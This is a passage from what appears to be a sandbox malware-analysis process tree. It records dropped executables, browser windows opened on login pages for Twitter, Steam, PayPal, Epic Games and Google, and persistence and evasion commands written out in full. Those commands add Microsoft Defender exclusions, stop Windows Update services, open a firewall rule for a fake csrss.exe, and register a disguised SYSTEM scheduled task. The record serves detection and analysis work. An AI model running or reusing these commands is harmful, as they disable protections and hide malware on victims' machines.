        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7976 /prefetch:1
        6⤵
        
        PID:2296
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
        6⤵
        
        PID:5532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
        6⤵
        
        PID:8116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8416 /prefetch:1
        6⤵
        
        PID:5368
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
        6⤵
        
        PID:8120
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
        6⤵
        
        PID:6712
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7220 /prefetch:1
        6⤵
        
        PID:7940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1
        6⤵
        
        PID:5784
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9232 /prefetch:1
        6⤵
        
        PID:3860
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1386856735112715935,1464450972432427571,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9708 /prefetch:2
        6⤵
        
        PID:6696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:2224
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,6179308319208076456,5525713717394060319,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5820
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,6179308319208076456,5525713717394060319,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        6⤵
        
        PID:5396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3416
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:5040
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,4814146829872629903,5479968271124747864,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,4814146829872629903,5479968271124747864,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
        6⤵
        
        PID:5316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3872
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:2256
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,13489030371495409234,2502525790805593219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5656
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13489030371495409234,2502525790805593219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
        6⤵
        
        PID:5648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2524
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:4220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13152531096123174991,15343213973745018005,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4996
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,3549334384314051782,6248839335615327652,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
        6⤵
        
        PID:6792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4804
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
        6⤵
        
        PID:4488
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14615494258720711105,2106896183398647715,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7496
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Kf7265.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Kf7265.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:2740
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:6608
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 544
        6⤵
        Program crash
        
        PID:6520
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3co79xu.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3co79xu.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:6892
- C:\Users\Admin\AppData\Local\Temp\4467.exe
  C:\Users\Admin\AppData\Local\Temp\4467.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3312
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    PID:7764
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:7012
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6848
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:396
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:6772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:6600
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      PID:392
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:7740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:2124
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:1624
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5772
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4428
- C:\Users\Admin\AppData\Local\Temp\52A0.exe
  C:\Users\Admin\AppData\Local\Temp\52A0.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:7488
- C:\Users\Admin\AppData\Local\Temp\59E5.exe
  C:\Users\Admin\AppData\Local\Temp\59E5.exe
  2⤵
  - Executes dropped EXE
  PID:5700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=59E5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:8124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
      4⤵
      PID:6548
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=59E5.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:5840
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
      4⤵
      PID:1212
- C:\Users\Admin\AppData\Local\Temp\5EA8.exe
  C:\Users\Admin\AppData\Local\Temp\5EA8.exe
  2⤵
  - Executes dropped EXE
  PID:5564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=5EA8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:5204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
      4⤵
      PID:5004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=5EA8.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:4016
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd6d2946f8,0x7ffd6d294708,0x7ffd6d294718
      4⤵
      PID:2032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:7544
- C:\Users\Admin\AppData\Local\Temp\AAA7.exe
  C:\Users\Admin\AppData\Local\Temp\AAA7.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5700
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:2468
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:7864
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4056
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2296
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3784
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6828
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:408
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8156
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5092
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6404
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:3112
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5384
- C:\Users\Admin\AppData\Local\Temp\61E2.exe
  C:\Users\Admin\AppData\Local\Temp\61E2.exe
  2⤵
  - Executes dropped EXE
  PID:6024
- C:\Users\Admin\AppData\Local\Temp\78F5.exe
  C:\Users\Admin\AppData\Local\Temp\78F5.exe
  2⤵
  - Executes dropped EXE
  PID:1576
- C:\Users\Admin\AppData\Local\Temp\7A7D.exe
  C:\Users\Admin\AppData\Local\Temp\7A7D.exe
  2⤵
  - Executes dropped EXE
  PID:6804
- C:\Users\Admin\AppData\Local\Temp\7BA7.exe
  C:\Users\Admin\AppData\Local\Temp\7BA7.exe
  2⤵
  - Executes dropped EXE
  PID:5244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:3460
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6244
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:228
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6304
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3924
- - C:\Windows\System32\sc.exe
